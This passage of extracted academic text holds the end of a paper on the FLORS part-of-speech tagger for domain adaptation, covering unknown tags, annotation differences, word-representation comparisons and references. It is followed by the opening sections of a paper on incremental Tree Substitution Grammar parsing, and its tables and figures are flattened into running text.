the range of methods that can be applied; e.g., it is difficult to find a good CRF implementation that can handle real-valued features – which are of criti- cal importance for our representation. (ii) The time complexity of FLORS in tagging is O(skf) where s is the length of the sentence, k is the number of tags and f is the number of non-zero fea- tures per local-context representation. In contrast, sequence decoding complexity is O(sk2f). This difference is not of practical importance for stan- dard English POS sets, but it could be an argument against sequence classification for tagging problems with much larger tag sets. In summary, replacing sequence classification with local-context classification is attractive for large-scale, practical tagging. What DA can and cannot do. Despite the supe- rior DA tagging results we report for FLORS in this paper, there is still a gap of 2%–7% (depending on the domain) between in-domain WSJ accuracy and DA accuracy on SANCL. In our analysis of this gap, we found some evidence that DA performance can be further improved – especially as more unlabeled TD data becomes available. But we also found two reasons for low performance that unsupervised DA cannot do anything about: differences in tag sets – or unknown tags – and differences in annotation guide- lines. Table 4 shows that unknown tags occur in five of the seven TDs at rates between 0% (weblogs) and 1% (BIO). Each token that is tagged with an un- known tag is necessarily an error in unsupervised DA. Furthermore, the unknown tag can also im- pact tagging accuracy in the local context4 – so the unknown tag rates in Table 4 are probably lower bounds for the error that is due to unknown tags. Based on these considerations, it is not surprising that tagging accuracy (e.g., of FLORS basic) and unknown tag rate are correlated as we can see in Ta- bles 2, 4 and 6; e.g., we get the highest accuracies in the two domains that do not have unknown tags (weblogs and WSJ) and the lowest accuracy in the domain with the highest rate (BIO). Since unknown tags cannot be predicted correctly, one could simply report accuracy on known tags. However, given the negative effect of unknown tags on tagging accuracy of the local context in which they occur, excluding unknown tags does not fully address the problem. For this reason, it is probably best to keep the common practice of simply report- ing accuracy on all tokens, including unknown tags. But the percentages of unknown tags should also be reported for each dataset as a basis for a more accu- rate interpretation of results. Another type of error that cannot be avoided in unsupervised DA is due to differences in annota- tion guidelines. There are a few such problems in SANCL; e.g., file names like “Services.doc” are an- notated as NN in the email domain. But their dis- tributional and grammatical behavior is more simi- lar to NNPs; as a consequence, most file names are incorrectly tagged. In general, it is difficult to dis- criminate NNs from NNPs. The Penn Treebank an- notation guidelines (Santorini, 1990) are compatible with either tag in many cases and it may simply be impossible to write annotation guidelines that avoid these problems (cf. Manning (2011)). NN-NNP in- consistencies are especially problematic for OOV tagging since most OOVs are NNs or NNPs. 4For example, there is a special tag ADD in the web do- main for web addresses. The last two words of the sentence “I would like to host my upcoming website to/IN Liquid- web.com/ADD” are mistagged by Stanford tagger as “... to/TO Liquidweb.com/VB”. So the missing tag in this case also affects the tagging of surrounding words. 21 bio dev wsj train OOV ALL ALL NN 62.4 25.4 14.4 JJ 15.9 8.9 6.2 NNS 10.2 7.5 6.3 NNP 0.5 0.2 9.5 NNPS 0.0 0.0 0.3 Table 5: Frequency of some tags (percent of tokens) for bio dev and wsj train. While the amount of inconsistent annotation is limited for SANCL, it is a serious problem for BIO. Table 5 shows that the proportion of NNPs in BIO is less than a tenth of that in WSJ (.2 in BIO vs. 9.5 in WSJ). This is due to the fact that many bio- specific names, in particular genes, are annotated as NN. In contrast, the distributionally and orthograph- ically most similar names in WSJ are tagged as NNP. For example, we find “One cell was teased out, and its DNA/NNP extracted” in WSJ vs. “DNA/NN was isolated” in BIO. standard setup NNP→NN ALL OOV ALL OOV TnT 87.49∗ 59.08∗ 91.75∗ 78.33∗ Stanford 88.46∗ 62.55∗ 92.36∗ 79.19∗ SVMTool 88.33∗ 61.30∗ 92.47 79.46∗ C&P 87.82∗ 60.60∗ 92.06∗ 79.30∗ F L O R S basic 88.90 64.74 92.91 82.58 n = 250 88.90 64.51 92.93 82.47 n = 0 87.27∗ 57.75∗ 90.91∗ 73.57∗ no suffixes 88.09∗ 62.20∗ 91.98∗ 79.27∗ no shapes 87.78∗ 59.82∗ 91.81∗ 77.31∗ l = 1 89.12 65.52 92.99 82.90 Table 6: Tagging accuracy on bio dev. NNP→NN results were obtained by replacing NNPs with NNs. Given this large discrepancy in the frequency of the tag NNP – which arguably is due to different annotation guidelines, not due to underlying differ- ences between the two genres – BIO should proba- bly not be used for evaluating DA. This is why we did not include it in our comparison in Table 2. For sake of completeness, we provide tagging ac- curacies for BIO in Table 6, “standard setup”. The results are in line with SANCL results: FLORS beats the baselines on ALL and OOV accuracies. However, if we build the NN bias into our model by simply replacing all NNP tags with NN tags, then accuracy goes up by 4% on ALL and by almost 20% on OOV. Even TnT, the most basic tagger, achieves ALL/OOV accuracy of 91.75/78.33, better than any method in the standard setup. These accuracies are well above those in (Blitzer et al., 2006) and (Huang and Yates, 2010). Since simply replacing NNPs with NNs has such a large effect, BIO cannot be used sensibly for eval- uating DA methods. In practice, it is not possible to separate “true” improvements due to generic bet- ter DA from elements of the proposed method that simply introduce a negative bias for NNP. In summary, when comparing different DA meth- ods caution should be exercised in the choice of do- mains. In particular, the effect of unknown tags should be made transparent and the gold standards should be analyzed to determine whether the task addressed in the TD differs significantly in some as- pects from that addressed in the source domain. 5 Comparison of word representations Our approach to DA is an instance of representation learning: we aim to find representations that are ro- bust across domains. In this section, we compare FLORS with two other widely used representation learning methods: (i) Brown clusters (Brown et al., 1992) and (ii) C&W embeddings, the word embed- dings of Collobert et al. (2011). We use f dist(w) = f left(w)⊕f right(w) to refer to our own distributional word representations (see Section 2). The perhaps oldest and most frequently used low- dimensional representation of words is based on Brown clusters. Typically, prefixes of Brown clus- ters (Brown et al., 1992) are added to increase the robustness of POS taggers (e.g., Toutanova et al. (2003)). Computational costs are high (quadratic in the vocabulary size) although the computation can be parallelized (Uszkoreit and Brants, 2008). More recently, general word representations (Col- lobert et al., 2011; Turian et al., 2010) have been used for robust POS tagging. These word represen- tations are typically trained on a large amount of un- labeled text and fine-tuned for specific NLP tasks. Similar to Brown clusters, they are low-dimensional and can be used as features in many NLP tasks, ei- 22 ther alone or in combination with other features. To compare f dist(w) (our distributional repre- sentations) with Brown clusters, we induced 1000 Brown clusters on the joint corpus data DALL (see Section 2) using the publicly available implemen- tation of Liang (2005). We padded sentences with 〈BOUNDARY〉 tokens on each side and used path prefixes of length 4, 6, 10 and 20 as features for each word (cf. Ratinov and Roth (2009), Turian et al. (2010)). C&W embeddings are provided by Collobert et al. (2011): 50-dimensional vectors for 130,000 words from WSJ, trained on Wikipedia. Similar to our dis- tributional representations fdist(w), the embeddings also contain a 〈BOUNDARY〉 token (which they call PADDING). Moreover, they have a special em- bedding for unknown words (called UNKNOWN) which we use whenever we encounter a word that is not in their lookup table. We preprocess our raw tokens the same way they do (lowercase and replace sequences of digits by “0”) before we look up a rep- resentation during training and testing. We replaced the distributional features in our ba- sic setup by either Brown cluster features or C&W embeddings. Table 7 repeats lines 5 and 7 of Table 2 and gives results of the modified FLORS setup. All three representations improve both ALL and OOV accuracies in all domains. fdist outperforms Brown in all cases except for OOV on emails. Brown may suffer from noisy data; cleaning meth- ods have been used in the literature (Liang, 2005; Turian et al., 2010), but they are not unproblematic since a large part of the data available is lost, which results in more unknown words. Brown and fdist can be directly compared since they were trained on exactly the same data. fdist and C&W are harder to compare directly because there are many differences. (i) C&W is trained on a much larger dataset. One consequence of this is that OOV accuracy on WSJ may be higher because some words that are unknown for other methods are actually known to C&W. (ii) C&W vectors are not trained on the SANCL TD data sets – this gives fdist an advantage. (iii) C&W vectors are not trained on the WSJ. Again, this could give fdist an advantage. (iv) C&W and fdist are fundamentally different in the way they handle unknown words. C&W has a lim- ited vocabulary and must replace all words not in this vocabulary by the token UNKNOWN. In con- trast, fdist can create a meaningful individual repre- sentation for any OOV word it encounters. Our FLORS tagger provides best ALL accuracies in all domains but WSJ, where C&W has best re- sults. The good performance of C&W is rather un- surprising since the embeddings were created for the 130,000 most frequent words of the WSJ and thus cover the WSJ domain much better. Also, WSJ was used to tune parameters during development. As with our previous experiments, OOV results on emails seem slightly more sensitive to parameter choices than on other domains (recall the discussion of this issue in Section 4). In summary, we have shown that fdist represen- tations work better for POS DA than Brown clus- ters. Furthermore, the evidence we have presented suggests that fdist are comparable in performance to C&W embeddings if not better for POS DA. The most important difference between fdist and Brown / C&W is that fdist are much simpler and much faster to compute. They are simpler because they are just slightly transformed counts in contrast to the other two approaches, which solve complex optimization problems. fdist can be computed effi- ciently through simple incrementation in one pass through the corpus. In contrast, the other two ap- proaches are an order of magnitude slower. 6 Related work Unsupervised DA methods can be broadly put into four categories: representation learning and constraint-based frameworks – which require some tailoring to a task – and instance weighting and boot- strapping – which can be more generally applied to a wide range of problems. Since many approaches are application-specific, we focus on the ones that have been applied to POS tagging. Representation learning. We already discussed two important approaches to representation learning in Section 5: C&W embeddings and Brown clusters. Blitzer et al.’s (2006) structural correspondence learning (SCL) supports DA by creating similar representations for correlated features in the pivot feature space. This is a potentially powerful method. FLORS is simpler in that correlations are made directly accessible to the supervised learner. 23 newsgroups reviews weblogs answers emails wsj ALL OOV ALL OOV ALL OOV ALL OOV ALL OOV ALL OOV 1 F L O R S fdist(w), n=500 90.86 66.42 92.95 75.29 94.71 83.64 90.30 62.15 89.44 62.61 96.59 90.37 2 fdist(w), n=0 89.14 ∗ 55.59∗ 91.80∗ 66.31∗ 93.40∗ 72.55∗ 89.47∗ 55.82∗ 88.21∗ 57.83∗ 96.29∗ 85.55∗ 3 C&W for fdist(w) 90.57 64.57 92.54 ∗ 72.48∗ 94.51 80.58∗ 90.23 60.99 89.44 63.13 96.72 90.48 4 Brown for fdist(w) 90.34 ∗ 62.41∗ 92.23∗ 71.47∗ 94.45 81.76 89.71∗ 56.28∗ 89.02∗ 63.20 96.48∗ 87.50 Table 7: Tagging accuracy of different word representations on the dev sets. Line 1 corresponds to FLORS basic. n: number of indicator words. A column’s best result is bold. Moreover, FLORS representations consist of simple counts whereas SCL solves a separate optimization problem for each pivot feature. Umansky-Pesin et al. (2010) derive distributional information for OOVs by running web queries. This approach is slow since it depends on a search engine. Ganchev et al. (2012) successfully use search logs. This is a promising enhancement for FLORS. Huang and Yates (2009) evaluate CRFs with dis- tributional features. They examine lower dimen- sional feature representations using SVD or the la- tent states of an unsupervised HMM. They find bet- ter accuracies for their HMM method than Blitzer et al. (2006); however, they do not compare them against a CRF baseline using distributional features. In later work, Huang and Yates (2010) add the la- tent states of multiple, differently trained HMMs as features to their CRF. Huang and Yates (2012) ar- gue that finding an optimal feature representation is computationally intractable and propose a new framework that allows prior knowledge to be inte- grated into representation learning. Latent sequence states are a form of word repre- sentation. Thus, it would be interesting to compare them to the non-sequence-based distributional rep- resentation that FLORS uses. Constraint-based methods. Rush et al. (2012) use global constraints on OOVs to improve out-of- domain tagging. Although constraints ensure con- sistency, they require careful manual engineering. Distributional features can also be seen as a form of constraint since feature weights will be shared among all words. Subramanya et al. (2010) construct a graph to en- courage similar n-grams to be tagged similarly, re- sulting in moderate gains in one domain, but no gains on BIO when compared to self-training. The reason could be an insufficient amount of unsuper- vised data for BIO (100,000 sentences). Our ap- proach does not seem to suffer from this problem. Bootstrapping. Both self-training (McClosky et al., 2006) – which uses one classification model – and co-training (Blum and Mitchell, 1998) – which uses ≥2 models – have been applied to POS tagging. Self-training usually improves a POS baseline only slightly if at all (Huang et al., 2009; Huang and Yates, 2010). Devising features based on labeled in- stances (instead of training on them) has been more successful (Florian et al., 2004; Søgaard, 2011). Chen et al. (2011) use co-training for DA. In each round of their algorithm, both new training instances from the unlabeled data and new features are added. Their model is limited to binary classification. The co-training method of Kübler and Baucom (2011) trains several taggers and adds sentences from the TD to the training set on which they agree. They report slight, but statistically significant increases in accuracy for POS tagging of dialogue data. Instance weighting. Instance weighting formal- izes DA as the problem of having data from differ- ent probability distributions in each domain. The goal is to make these two distributions align by us- ing instance-specific weights during training. Jiang and Zhai (2007) propose a framework that integrates prior knowledge from different data sets into the learning objective by weights. In related work, C&P train generalized and domain-specific models. An input sentence is tagged by the model that is most similar to the sentence. FLORS could be easily extended along these lines, an experiment we plan for the future. In terms of the basic classification setup, our POS tagger is most similar to the SVM-based approaches of Giménez and Màrquez (2004) and C&P. How- ever, we do not use a left-to-right approach when tagging sentences. Moreover, SVMTool trains two separate models, one for OOVs and one for known words. FLORS only has a single model. In addition, 24 we do not make use of ambiguity classes, token-tag dictionaries and rare feature thresholds. Instead, we rely only on three types of features: distributional representations, suffixes and word shapes. The local-context-only approach of SVMTool, C&P and FLORS is different from standard se- quence classification such as MEMMs (e.g., Rat- naparkhi (1996), Toutanova et al. (2003), Tsuruoka and Tsujii (2005)) and CRFs (e.g., Collins (2002)). Sequence models are more powerful in theory, but this may not be an advantage in DA because the sub- tle dependencies they exploit may not hold across domains. 7 Conclusion We have presented FLORS, a new POS tagger for DA. FLORS uses robust representations that work especially well for unknown words and for known words with unseen tags. FLORS is simpler and faster than previous DA methods, yet we were able to demonstrate that it has significantly better accu- racy than several baselines. Acknowledgments. This work was supported by DFG (Deutsche Forschungsgemeinschaft). References John Blitzer, Ryan McDonald, and Fernando Pereira. 2006. Domain adaptation with structural correspon- dence learning. In EMNLP, pages 120–128. Avrim Blum and Tom Mitchell. 1998. Combining la- beled and unlabeled data with co-training. In COLT, pages 92–100. Thorsten Brants. 2000. TnT: A statistical part-of-speech tagger. In ANLP, pages 224–231. Peter F. Brown, Peter V. deSouza, Robert L. Mercer, Vin- cent J. Della Pietra, and Jenifer C. Lai. 1992. Class- based n-gram models of natural language. Computa- tional Linguistics, 18:467–479. Minmin Chen, Kilian Q. Weinberger, and John Blitzer. 2011. Co-training for domain adaptation. In NIPS, pages 1–9. Jinho D. Choi and Martha Palmer. 2012. Fast and robust part-of-speech tagging using dynamic model selection. In ACL: Short Papers, pages 363–367. Michael Collins. 2002. Discriminative training methods for hidden Markov models: Theory and experiments with perceptron algorithms. In EMNLP, pages 1–8. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011. Natural language processing (almost) from scratch. The Journal of Machine Learning Research, 12:2493– 2537. Rong-En Fan, Kai-Wei Chang, Cho-Jui Hsieh, Xiang-Rui Wang, and Chih-Jen Lin. 2008. LIBLINEAR: A li- brary for large linear classification. The Journal of Machine Learning Research, 9:1871–1874. Steven Finch and Nick Chater. 1992. Bootstrapping syn- tactic categories using statistical methods. In Back- ground and Experiments in Machine Learning of Nat- ural Language, pages 229–235. Radu Florian, Hany Hassan, Abraham Ittycheriah, Hongyan Jing, Nanda Kambhatla, Xiaoqiang Luo, Nicolas Nicolov, and Salim Roukos. 2004. A statisti- cal model for multilingual entity detection and track- ing. In HLT-NAACL, pages 1–8. Kuzman Ganchev, Keith Hall, Ryan McDonald, and Slav Petrov. 2012. Using search-logs to improve query tag- ging. In ACL: Short Papers, pages 238–242. Jesús Giménez and Lluís Màrquez. 2004. SVMTool: A general pos tagger generator based on support vector machines. In LREC, pages 43–46. Fei Huang and Alexander Yates. 2009. Distributional representations for handling sparsity in supervised sequence-labeling. In ACL-IJCNLP, pages 495–503. Fei Huang and Alexander Yates. 2010. Exploring representation-learning approaches to domain adapta- tion. In DANLP, pages 23–30. Fei Huang and Alexander Yates. 2012. Biased repre- sentation learning for domain adaptation. In EMNLP- CoNLL, pages 1313–1323. Zhongqiang Huang, Vladimir Eidelman, and Mary Harper. 2009. Improving a simple bigram HMM part- of-speech tagger by latent annotation and self-training. In NAACL-HLT: Short Papers, pages 213–216. Jing Jiang and ChengXiang Zhai. 2007. Instance weight- ing for domain adaptation in NLP. In ACL, pages 264– 271. S. Sathiya Keerthi and Chih-Jen Lin. 2003. Asymptotic behaviors of support vector machines with Gaussian kernel. Neural computation, 15(7):1667–1689. Sandra Kübler and Eric Baucom. 2011. Fast domain adaptation for part of speech tagging for dialogues. In RANLP, pages 41–48. Percy Liang, Hal Daumé III, and Dan Klein. 2008. Structure compilation: trading structure for features. In ICML, pages 592–599. Percy Liang. 2005. Semi-supervised learning for natural language processing. Master’s thesis, Massachusetts Institute of Technology. Christopher D. Manning. 2011. Part-of-speech tagging from 97% to 100%: Is it time for some linguistics? In CICLing, pages 171–189. 25 Mitchell P. Marcus, Mary Ann Marcinkiewicz, and Beat- rice Santorini. 1993. Building a large annotated cor- pus of English: The Penn treebank. Computational Linguistics, 19(2):313–330. David McClosky, Eugene Charniak, and Mark Johnson. 2006. Reranking and self-training for parser adapta- tion. In ACL, pages 337–344. John Miller, Manabu Torii, and Vijay K. Shanker. 2007. Building domain-specific taggers without annotated (domain) data. In EMNLP-CoNLL, pages 1103–1111. Slav Petrov and Dan Klein. 2007. Improved inference for unlexicalized parsing. In HLT-NAACL, pages 404– 411. Slav Petrov and Ryan McDonald. 2012. Overview of the 2012 Shared Task on Parsing the Web. Notes of the 1st SANCL Workshop. Lev Ratinov and Dan Roth. 2009. Design challenges and misconceptions in named entity recognition. In CoNLL, pages 147–155. Adwait Ratnaparkhi. 1996. A maximum entropy model for part-of-speech tagging. In EMNLP, pages 133– 142. Alexander M. Rush, Roi Reichart, Michael Collins, and Amir Globerson. 2012. Improved parsing and POS tagging using inter-sentence consistency constraints. In EMNLP-CoNLL, pages 1434–1444. Beatrice Santorini. 1990. Part-of-speech tagging guide- lines for the Penn Treebank project (3rd revision, 2nd printing). Technical report, Department of Linguistics, University of Pennsylvania. Tobias Schnabel and Hinrich Schütze. 2013. Towards robust cross-domain domain adaptation for part-of- speech tagging. In IJCNLP, pages 198–206. Hinrich Schütze. 1993. Part-of-speech induction from scratch. In ACL, pages 251–258. Hinrich Schütze. 1995. Distributional part-of-speech tagging. In EACL, pages 141–148. Anders Søgaard. 2011. Semisupervised condensed near- est neighbor for part-of-speech tagging. In ACL: Short papers, pages 48–52. Amarnag Subramanya, Slav Petrov, and Fernando Pereira. 2010. Efficient graph-based semi-supervised learning of structured tagging models. In EMNLP, pages 167–176. Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic dependency network. In NAACL- HLT, pages 173–180. Yoshimasa Tsuruoka and Jun’ichi Tsujii. 2005. Bidirec- tional inference with the easiest-first strategy for tag- ging sequence data. In EMNLP-HLT, pages 467–474. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: A simple and general method for semi-supervised learning. In ACL, pages 384–394. Shulamit Umansky-Pesin, Roi Reichart, and Ari Rap- poport. 2010. A multi-domain web-based algorithm for POS tagging of unknown words. In COLING, pages 1274–1282. Jakob Uszkoreit and Thorsten Brants. 2008. Distributed word clustering for large scale class-based language modeling in machine translation. In ACL, pages 755– 762. 26 work_pvs3jywvl5ajbjupklysfpwute ---- Incremental Tree Substitution Grammar for Parsing and Sentence Prediction Federico Sangati and Frank Keller Institute for Language, Cognition, and Computation School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB, UK federico.sangati@gmail.com keller@inf.ed.ac.uk Abstract In this paper, we present the first incremental parser for Tree Substitution Grammar (TSG). A TSG allows arbitrarily large syntactic frag- ments to be combined into complete trees; we show how constraints (including lexical- ization) can be imposed on the shape of the TSG fragments to enable incremental process- ing. We propose an efficient Earley-based al- gorithm for incremental TSG parsing and re- port an F-score competitive with other incre- mental parsers. In addition to whole-sentence F-score, we also evaluate the partial trees that the parser constructs for sentence prefixes; partial trees play an important role in incre- mental interpretation, language modeling, and psycholinguistics. Unlike existing parsers, our incremental TSG parser can generate partial trees that include predictions about the up- coming words in a sentence. We show that it outperforms an n-gram model in predicting more than one upcoming word. 1 Introduction When humans listen to speech, the input becomes available gradually as the speech signal unfolds. Reading happens in a similarly gradual manner when the eyes scan a text. There is good evidence that the human language processor is adapted to this and works incrementally, i.e., computes an interpre- tation for an incoming sentence on a word-by-word basis (Tanenhaus et al., 1995; Altmann and Kamide, 1999). Also language processing systems often deal with speech as it is spoken, or text as it is being typed. A dialogue system should start interpreting a sentence while it is being spoken, and a question answering system should start retrieving answers be- fore the user has finished typing the question. Incremental processing is therefore essential both for realistic models of human language processing and for NLP applications that react to user input in real time. In response to this, a number of in- cremental parsers have been developed, which use context-free grammar (Roark, 2001; Schuler et al., 2010), dependency grammar (Chelba and Jelinek, 2000; Nivre, 2007; Huang and Sagae, 2010), or tree- adjoining grammar (Demberg et al., 2014). Typical applications of incremental parsers include speech recognition (Chelba and Jelinek, 2000; Roark, 2001; Xu et al., 2002), machine translation (Schwartz et al., 2011; Tan et al., 2011), reading time modeling (Demberg and Keller, 2008), or dialogue systems (Stoness et al., 2004). Another potential use of incre- mental parsers is sentence prediction, i.e., the task of predicting upcoming words in a sentence given a prefix. However, so far only n-gram models and clas- sifiers have been used for this task (Fazly and Hirst, 2003; Eng and Eisner, 2004; Grabski and Scheffer, 2004; Bickel et al., 2005; Li and Hirst, 2005). In this paper, we present an incremental parser for Tree Substitution Grammar (TSG). A TSG contains a set of arbitrarily large tree fragments, which can be combined into new syntax trees by means of a sub- stitution operation. An extensive tradition of parsing with TSG (also referred to as data-oriented parsing) exists (Bod, 1995; Bod et al., 2003), but none of the existing TSG parsers are incremental. We show how constraints can be imposed on the shape of the TSG fragments to enable incremental processing. We pro- pose an efficient Earley-based algorithm for incre- mental TSG parsing and report an F-score competi- tive with other incremental parsers. Transactions of the Association for Computational Linguistics 1: May, 111–124, 2013. TSG fragments can be arbitrarily large and can contain multiple lexical items. This property enables our incremental TSG parser to generate partial parse trees that include predictions about the upcoming words in a sentence. It can therefore be applied di- rectly to the task of sentence prediction, simply by reading off the predicted items in a partial tree. We show that our parser outperforms an n-gram model in predicting more than one upcoming word. The rest of the paper is structured as follows. In Section 2, we introduce the ITSG framework and re- late it to the original TSG formalism. Section 3 de- scribes the chart-parser algorithm, while Section 4 details the experimental setup and results. Sections 5 and 6 present related work and conclusions. 2 Incremental Tree Substitution Grammar The current work is based on Tree Substitu- tion Grammar (TSG, Schabes 1990; for a recent overview see Bod et al. 2003). A TSG is composed of (i) a set of arbitrarily large fragments, usually ex- tracted from an annotated phrase-structure treebank, and (ii) the substitution operation by means of which fragments can be combined into complete syntactic analyses (derivations) of novel sentences. Every fragment’s node is either a lexical node (word), a substitution site (a non-lexical node in the yield of the structure),1 or an internal node. An inter- nal node must always keep the same daughter nodes as in the original tree. For an example of a binarized2 tree and a fragment extracted from it see Figure 1. A TSG derivation is constructed in a top-down generative process starting from a fragment in the grammar rooted in S (the unique non-lexical node all syntactic analysis are rooted in). A partial deriva- tion is extended by subsequently introducing more fragments: if X is the left-most substitution site in the yield of the current partial derivation, a fragment 1For example nodes NP, VP, S@ are the substitution sites of the right fragment in Figure 1. 2The tree is right-binarized via artificial nodes with @ sym- bols, as explained in Section 4.1. The original tree is S . “.” VP VP VBN “disclosed” VBD “were” NP NNS “Terms” S S@ S@ . “.” VP VP VBN “disclosed” VBD “were” NP NNS “Terms” S S@ S@VP VPVBD “were” NP Figure 1: An example of a binarized2 parse tree and a lexicalized fragment extracted from it. rooted in X is chosen from the grammar and sub- stituted into it. When there are no more substitution sites (all nodes in the yield are lexical items) the gen- erative process terminates. 2.1 Incrementality In this work we are interested in defining an incre- mental TSG (in short ITSG). The new generative process, while retaining the original mechanism for combining fragments (by means of the substitution operation), must ensure a way for deriving syntactic analyses of novel sentences in an incremental man- ner, i.e., one word at the time from left to right. More precisely, at each stage of the generative process, the partially derived structure must be connected (as in standard TSG) and have a prefix of the sentence at the beginning of its yield. A partial derivation is con- nected if it has tree shape, i.e., all the nodes are dom- inated by a common root node (which does not nec- essarily have to be the root node of the sentence). For instance, the right fragment in Figure 1 shows a possible way of starting a standard TSG derivation which does not satisfy the incrementality constraint: the partial derivation has a substitution site as the first element in its yield. In order to achieve incrementality while maintain- ing connectedness, we impose one further constraint on the type of fragments which are allowed in an ITSG: each fragment should be lexicalized, i.e., con- tain at least one word (lexical anchor) at the first or the second position in its yield. Allowing more than one substitution site at the beginning of a fragment’s yield would lead to a violation of the incrementality requirement (as will become clear in Section 2.2). 2 The generative process starts with a fragment an- chored in the first word of the sentence being gener- ated. At each subsequent step, a lexicalized fragment is introduced (by means of the substitution opera- tion) to extend the current partial derivation in such a way that the prefix of the yield of the partial struc- ture is lengthened by one word (the lexical anchor of the fragment being introduced). The lexicalization constraint allows a fragment to have multiple lexical items, not necessarily adjacent to one another. This is useful to capture the general ability of TSG to pro- duce in one single step an arbitrarily big syntactic construction ranging from phrasal verbs (e.g., ask someone out), to parallel constructions (e.g., either X or Y), and idiomatic expressions (e.g., took me to the cleaners). For an example of a fragment with multiple lexical anchors see the fragment in the mid- dle of Figure 2. 2.2 Symbolic Grammar An ITSG is a tuple 〈N ,L ,F ,4,5,�〉, where N and L are the set of non-lexical and lexical nodes respectively, F is a collection of lexicalized frag- ments, 4 and 5 are two variants of the substitution operation (backward and forward) used to combine fragments into derivations, and � is the stop opera- tion which terminates the generative process. Fragments A fragment f ∈ F belongs to one of the three sets Finit,F Xlex,F Y sub: • An initial fragment ( finit ) has the lexical anchor in the first position of the yield, being the initial word of a sentence (the left-most lexical node of the parse tree from which it was extracted). • A lex-first fragment ( f Xlex) has the lexical anchor (non sentence-initial) in the first position of the yield, and is rooted in X .3 • A sub-first fragment ( f Ysub) has the lexical an- chor in the second position of its yield, and a substitution site Y in the first. Fringes We will use fringes (Demberg et al., 2014) as a compressed representation of fragments, 3A fragment can be both an initial and a lex-first fragment (e.g., if the lexical anchor is a proper noun). We will make use of two separate instances of the same fragment in the two sets. NP NNS “Terms” 5 S S@ S@ . “.” VP VPVBD “were” NP 4 VP VBN “disclosed” �S Figure 2: An example of an ITSG derivation yielding the tree on the left side of Figure 1. The second and third frag- ment are introduced by means of forward and backward substitution, respectively. in which the internal structure is replaced by a trian- gle ( a or �) and only the root and the yield are vis- ible. It is possible in a grammar that multiple frag- ments map to the same fringe; we will refer to those as ambiguous fringes. We use both vertical ( a , e.g., in Figure 3 and 4) and horizontal (�) fringe nota- tion. The latter is used for describing the states in our chart-parsing algorithm in Section 3. For instance, the horizontal fringe representation of the right frag- ment in Figure 1 is S � NP “were” VP S@. Incremental Derivation An incremental deriva- tion is a sequence of lexicalized fragments 〈 f1, f2,..., fn〉 which, combined together in the specified order, give rise to a complete parse tree (see Figure 2 for an example). The first fragment f1 being introduced in the derivation must be an initial fragment, and its lexical anchor constitutes the one- word prefix of the sentence being generated. Sub- sequent fragments are introduced by means of the substitution operation, which has two variants: back- ward substitution (4), which is used to substitute lex-first fragments into the partial derivation gener- ated so far, and forward substitution (5), which is used to substitute sub-first fragments into the partial derivation. After a number of fragments are intro- duced, a stop operation (�) may terminate the gen- erative process. Operations The three ITSG operations take place under specific conditions within an incremental derivation, as illustrated in Figure 3 and explained hereafter. At a given stage of the generative process (after an initial fragment has been inserted), the con- nected partial structure may or may not have sub- 3 Partial Structure Operation Accepted Fragment Resulting Structure Terminated Y `1 lex... `i X α... 4 (backward) X `i+1 β... Y `1 lex... `i+1 β... α... NO Y `1 lex... `i 5 (forward) X Y `i+1 α... X `1 lex... `i `i+1 α... NO Y `1 lex... `n � (stop) ∅ Y # ∅ `1 lex... `n # YES Figure 3: Schemata of the three ITSG operations. All tree structures (partial structure and fragments) are represented in a compact notation, which displays only the root nodes and the yields. The i-th words in the structure’s yield is represented as `i, while α and β stands for any (possibly empty) sequence of words and substitution sites. stitution sites present in its yield. In the first case, a backward substitution (4) must take place in the following generative step: if X is the left-most sub- stitution site, a new fragment of type f Xlex is chosen from the grammar and substituted into X . If the par- tially derived structure has no substitution site (all the nodes in its yield are lexical nodes) and it is rooted in Y , two possible choices exist: either the generative process terminates by means of the stop operation (�Y ), or the generative process contin- ues. In the latter case a forward substitution (5) is performed: a new f Ysub fragment is chosen from the grammar, and the partial structure is substituted into the left-most substitution site Y of the fragment.4 Multiple Derivations As in TSG, an ITSG may be able to generate the same parse tree in multiple ways: multiple incremental derivations yielding the same tree. Figure 4 shows one such example. Generative Capacity It is useful to clarify the dif- ference between ITSG and the more general TSG formalism in terms of generative capacity. Although both types of grammar make use of the substitu- tion operation to combine fragments, an ITSG im- poses more constraints on (i) the type of fragments which are allowed in the grammar (initial, lex-first, 4A stop operation can be viewed as a forward substitution when using an artificial sub-first fragment ∅ � Y # (stop frag- ment), where # is an artificial lexical node indicating the termi- nation of the sentence. For simplicity, stop fragments are omit- ted in Figure 2 and 4 and Y is attached to the stop symbol (�Y ). S S@ S@ . “.” VP VP VBN “disclosed” VBD “were” NP NNS “Terms” NP “Terms” 5 S NP “were” VP “.” 4 VP “disclosed” �S S “Terms” S@ 4 S@ “were” VP “.” 4 VP “disclosed” �S Figure 4: Above: an example of a set of fragments ex- tracted from the tree in Figure 1. Below: two incremental derivations that generate it. Colors (and lines strokes) in- dicate which derivation fragments belong to. and sub-first fragments), and (ii) the generative pro- cess with which fragments are combined (incremen- tally left to right instead of top-down). If we com- pare a TSG and an ITSG on the same set of (ITSG- compatible) fragments, then there are cases in which the TSG can generate more tree structures than the ITSG. In the following, we provide a more formal char- acterization of the strong and weak generative power 4 S X“a” X “c”X X “b” S X “c”X “c”X “c”X “b” “a” Figure 5: Left: an example of a CFG with left recursion. Right: one of the structures the CFG can generate. of ITSG with respects to context-free grammar (CFG) and TSG. (However, a full investigation of this issue is beyond the scope of this paper.) We can limit our analysis to CFG, as TSG is strongly equiv- alent to CFG. The weak equivalence between ITSG and CFG is straightforward: for any CFG there is a way to produce a weakly equivalent grammar in Greibach Normal Form in which any production has a right side beginning with a lexical item (Aho and Ullman, 1972). The grammar that results from this transformation is an ITSG which uses only back- ward substitutions. Left-recursion seems to be the main obstacle for strong equivalence between ITSG and CFG. As an example, the left side of Figure 5 shows a CFG that contains a left-recursive rule. The types of structures this grammar can generate (such as the one given on the right side of the same figure) are characterized by an arbitrarily long chain of rules that can intervene before the second word of the string, “b”, is gener- ated. Given the incrementality constraints, there is no ITSG that can generate the same set of struc- tures that this CFG can generate. However, it may be possible to circumvent this problem by applying the left-corner transform (Rosenkrantz and Lewis, 1970; Aho and Ullman, 1972) to generate an equiv- alent CFG without left-recursive rules. 2.3 Probabilistic Grammar In the generative process presented above there are a number of choices which are 